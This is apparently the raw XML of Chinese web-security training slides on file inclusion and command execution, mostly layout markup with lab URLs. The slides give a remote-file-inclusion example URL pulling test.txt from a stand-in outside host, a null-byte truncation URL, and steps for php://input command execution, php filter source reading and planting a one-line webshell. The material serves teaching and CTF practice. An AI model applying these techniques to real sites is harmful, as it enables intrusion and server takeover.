            <a:ext cx="893763" cy="890588"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 422 w 457"/>
              <a:gd name="T1" fmla="*/ 35 h 456"/>
              <a:gd name="T2" fmla="*/ 422 w 457"/>
              <a:gd name="T3" fmla="*/ 162 h 456"/>
              <a:gd name="T4" fmla="*/ 163 w 457"/>
              <a:gd name="T5" fmla="*/ 421 h 456"/>
              <a:gd name="T6" fmla="*/ 35 w 457"/>
              <a:gd name="T7" fmla="*/ 421 h 456"/>
              <a:gd name="T8" fmla="*/ 35 w 457"/>
              <a:gd name="T9" fmla="*/ 421 h 456"/>
              <a:gd name="T10" fmla="*/ 35 w 457"/>
              <a:gd name="T11" fmla="*/ 294 h 456"/>
              <a:gd name="T12" fmla="*/ 294 w 457"/>
              <a:gd name="T13" fmla="*/ 35 h 456"/>
              <a:gd name="T14" fmla="*/ 422 w 457"/>
              <a:gd name="T15" fmla="*/ 35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7" h="456">
                <a:moveTo>
                  <a:pt x="422" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="457" y="70"/>
                  <a:pt x="457" y="127"/>
                  <a:pt x="422" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163" y="421"/>
                  <a:pt x="163" y="421"/>
                  <a:pt x="163" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="456"/>
                  <a:pt x="70" y="456"/>
                  <a:pt x="35" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="421"/>
                  <a:pt x="35" y="421"/>
                  <a:pt x="35" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="386"/>
                  <a:pt x="0" y="329"/>
                  <a:pt x="35" y="294"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="294" y="35"/>
                  <a:pt x="294" y="35"/>
                  <a:pt x="294" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329" y="0"/>
                  <a:pt x="386" y="0"/>
                  <a:pt x="422" y="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26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65ED36B1-BA23-4A34-946C-BFED841AF9F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10263187" y="4295775"/>
            <a:ext cx="1257300" cy="1257300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 608 w 643"/>
              <a:gd name="T1" fmla="*/ 35 h 644"/>
              <a:gd name="T2" fmla="*/ 608 w 643"/>
              <a:gd name="T3" fmla="*/ 163 h 644"/>
              <a:gd name="T4" fmla="*/ 162 w 643"/>
              <a:gd name="T5" fmla="*/ 609 h 644"/>
              <a:gd name="T6" fmla="*/ 35 w 643"/>
              <a:gd name="T7" fmla="*/ 609 h 644"/>
              <a:gd name="T8" fmla="*/ 35 w 643"/>
              <a:gd name="T9" fmla="*/ 609 h 644"/>
              <a:gd name="T10" fmla="*/ 35 w 643"/>
              <a:gd name="T11" fmla="*/ 481 h 644"/>
              <a:gd name="T12" fmla="*/ 480 w 643"/>
              <a:gd name="T13" fmla="*/ 35 h 644"/>
              <a:gd name="T14" fmla="*/ 608 w 643"/>
              <a:gd name="T15" fmla="*/ 35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3" h="644">
                <a:moveTo>
                  <a:pt x="608" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="643" y="71"/>
                  <a:pt x="643" y="128"/>
                  <a:pt x="608" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162" y="609"/>
                  <a:pt x="162" y="609"/>
                  <a:pt x="162" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="644"/>
                  <a:pt x="70" y="644"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="573"/>
                  <a:pt x="0" y="516"/>
                  <a:pt x="35" y="481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516" y="0"/>
                  <a:pt x="573" y="0"/>
                  <a:pt x="608" y="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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F8D3AE9-BF87-4579-BBC3-889D88549D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1878240" y="1219520"/>
            <a:ext cx="401638" cy="403225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 206"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 206"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 206"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 206"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 206"/>
              <a:gd name="T9" fmla="*/ 3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6">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="206" y="73"/>
                  <a:pt x="206" y="132"/>
                  <a:pt x="169" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="206"/>
                  <a:pt x="73" y="206"/>
                  <a:pt x="36" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="132"/>
                  <a:pt x="0" y="73"/>
                  <a:pt x="36" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="0"/>
                  <a:pt x="132" y="0"/>
                  <a:pt x="169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28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA206DA9-9744-4A14-A1E0-0028AB469800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3388745" y="1293949"/>
            <a:ext cx="401638" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 205"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 205"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 205"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 205"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 205"/>
              <a:gd name="T9" fmla="*/ 3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6">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="205" y="73"/>
                  <a:pt x="205" y="132"/>
                  <a:pt x="169" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="206"/>
                  <a:pt x="73" y="206"/>
                  <a:pt x="36" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="132"/>
                  <a:pt x="0" y="73"/>
                  <a:pt x="36" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="0"/>
                  <a:pt x="132" y="0"/>
                  <a:pt x="169" y="36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29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C5076B3-79BF-4B73-96FC-6FA82025D587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9907587" y="5491162"/>
            <a:ext cx="403225" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169 w 206"/>
              <a:gd name="T1" fmla="*/ 36 h 206"/>
              <a:gd name="T2" fmla="*/ 169 w 206"/>
              <a:gd name="T3" fmla="*/ 169 h 206"/>
              <a:gd name="T4" fmla="*/ 36 w 206"/>
              <a:gd name="T5" fmla="*/ 169 h 206"/>
              <a:gd name="T6" fmla="*/ 36 w 206"/>
              <a:gd name="T7" fmla="*/ 36 h 206"/>
              <a:gd name="T8" fmla="*/ 169 w 206"/>
              <a:gd name="T9" fmla="*/ 3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6">
                <a:moveTo>
                  <a:pt x="169" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="206" y="73"/>
                  <a:pt x="206" y="132"/>
                  <a:pt x="169" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="206"/>
                  <a:pt x="73" y="206"/>
                  <a:pt x="36" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="132"/>
                  <a:pt x="0" y="73"/>
                  <a:pt x="36" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="0"/>
                  <a:pt x="132" y="0"/>
                  <a:pt x="169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4283801" y="2906712"/>
            <a:ext cx="3624399" cy="655784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4283801" y="3844953"/>
            <a:ext cx="3624399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署名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4283801" y="4160587"/>
            <a:ext cx="3624399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fld id="{CB3FFC9E-A4C1-40CB-8E0E-23B63E3543C5}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/6/19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5151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2017/12/9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5151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5151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695323" y="1016000"/>
            <a:ext cx="10810876" cy="109538"/>
            <a:chOff x="628642" y="0"/>
            <a:chExt cx="27229910" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="平行四边形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="628642" y="0"/>
              <a:ext cx="27229910" cy="6858000"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 4237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15" name="平行四边形 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="876300" y="0"/>
              <a:ext cx="7183962" cy="6858000"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 3876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16" name="平行四边形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1507597" y="0"/>
              <a:ext cx="6240991" cy="6858000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 6783916"/>
                <a:gd name="connsiteY0" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX1" fmla="*/ 2886624 w 6783916"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX2" fmla="*/ 6783916 w 6783916"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX3" fmla="*/ 3897292 w 6783916"/>
                <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 6783916"/>
                <a:gd name="connsiteY4" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 6240991"/>
                <a:gd name="connsiteY0" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX1" fmla="*/ 2886624 w 6240991"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX2" fmla="*/ 6240991 w 6240991"/>
                <a:gd name="connsiteY2" fmla="*/ 9525 h 6858000"/>
                <a:gd name="connsiteX3" fmla="*/ 3897292 w 6240991"/>
                <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 6240991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40991" h="6858000">
                  <a:moveTo>
                    <a:pt x="0" y="6858000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2886624" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6240991" y="9525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389729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xx.com/1.jpg%00" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxx.com/1.jpg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xxx1.com/index.php?page=http://www.xx2.com/test.txt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15744" y="3540202"/>
            <a:ext cx="5160513" cy="767764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zh-CN" altLang="en-US" sz="4000">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件包含和命令执行</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b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文本框 12">
            <a:extLst/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2690279" y="1650767"/>
            <a:ext cx="1729321" cy="158242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166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BUSINESS REPORT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16600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1DC87-3519-46DD-94F4-B1DC26693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文件包含实例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0E90EA-71EA-4B8E-96DF-54A46D9F9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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>10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467E10-51DA-40D6-AEFE-48F2BD4D899B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1358020"/>
            <a:ext cx="10850563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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>线上环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://cohux.com:701/fi/index.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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0C8C35A-9C7D-4076-A6EB-26BAB8B9C68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1810693"/>
            <a:ext cx="9261727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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>测试本地包含文件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95E4A55-5674-4B50-99B2-B4322A244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2180025"/>
            <a:ext cx="8953877" cy="185881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836A42D-DDB1-40B1-B0CF-9E94B3BDB778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488822" y="4114628"/>
            <a:ext cx="9134979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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>远程文件包含线上环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://cohux.com:7012/fileincl/example1.php?page=intro.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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BE336D2-E212-41BF-A1EA-A810A71DE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70" y="4559752"/>
            <a:ext cx="6485714" cy="1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291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27E11-42C6-42D9-880D-87A28C88B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文件包含实例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110DD0-D54D-4CD6-8716-CBBE2FAE3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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>11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32CDEA-7420-4B2E-9534-E71649467F38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1330859"/>
            <a:ext cx="10719335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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>远程文件包含写一句话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718DFF4-FAB6-4873-81C0-6DE0BD7BE664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1783533"/>
            <a:ext cx="10719335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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>线上地址 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://cohux.com:7012/fileincl/example1.php?page=intro.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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AB97A8B-4D29-4554-84B5-6284FD223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4418290"/>
            <a:ext cx="7733333" cy="220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486DBB6-C9CA-4370-B449-9EF50A538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238" y="2772672"/>
            <a:ext cx="7438095" cy="111428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81AB1E5-F88C-4AF5-A091-5491221E1159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="2152865"/>
            <a:ext cx="7514409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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>在自己的服务器上写入攻击代码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07E9632-EBF6-48B3-9CC5-86B17C6298ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="4058011"/>
            <a:ext cx="8102851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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>远程包含测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1588964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7C7F0-36E0-4202-A619-3CF77A04C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文件包含实例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8A8D2A-6A27-435A-B083-CF57E6578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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>12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12A874-F716-410B-AD71-FEC4F3475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1319776"/>
            <a:ext cx="7180952" cy="72381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2C59CFD-5AF0-4F0A-9A5E-994692D2E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42" y="2260866"/>
            <a:ext cx="5380952" cy="74285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2BEC77E-4E23-4B01-BF26-8E4F023F1C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="3204927"/>
            <a:ext cx="7731692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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>成功执行攻击代码，生成一句话</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2626620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339CE-EBF9-4F99-8D7A-FAF828F13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文件包含漏洞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php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流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input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433C1B-B005-4867-A693-1DCA9B207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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>13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25F36B7-7160-4165-8863-2C104142CF94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760491" y="1330859"/>
            <a:ext cx="10850563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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>线上环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:http://cohux.com:7012/fileincl/example1.php?page=intro.php</a:t>
            </a:r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5B3BC64-3322-41BA-84B1-ED34DC8D0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865" y="2442173"/>
            <a:ext cx="7952381" cy="254285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E16F3F0-FB75-44BC-A4ED-0B2C585E9BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760491" y="1846907"/>
            <a:ext cx="7595858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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>命令执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1881204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B87C2-7904-4F34-A43E-CAEB7F265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文件包含之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php filter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142A50-3213-4158-8C85-B46273C2F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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>14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F37E6AD-A3A6-4EA8-8C9C-5829808C9D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1376127"/>
            <a:ext cx="11054314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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>线上环境 ： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://cohux.com:7013/fi/index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>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9EFDDE0-C6CC-498F-9D17-D528A2646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1933417"/>
            <a:ext cx="9949758" cy="133279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2543DF2-DD57-4FBA-ADB8-9A70F1323A22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="3266210"/>
            <a:ext cx="9859256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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>源码 ，然后解密源码，得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>flag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E9E1B63-D653-4845-900E-61953BAC3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80" y="4028750"/>
            <a:ext cx="9142857" cy="17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637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CC9EF-3C71-425C-A7E1-B1399185E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有限制的文件包含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5C891A-3349-4DC5-8231-42823611E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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>15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95C8F45-0E50-48E1-A22E-9F62BEEDC66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851026" y="1403287"/>
            <a:ext cx="11199136" cy="3718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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>有些开发者为了防止本地包含漏洞，会编写一下代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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en-US" altLang="zh-CN"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en-US" altLang="zh-CN"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cs typeface="+mn-ea"/>
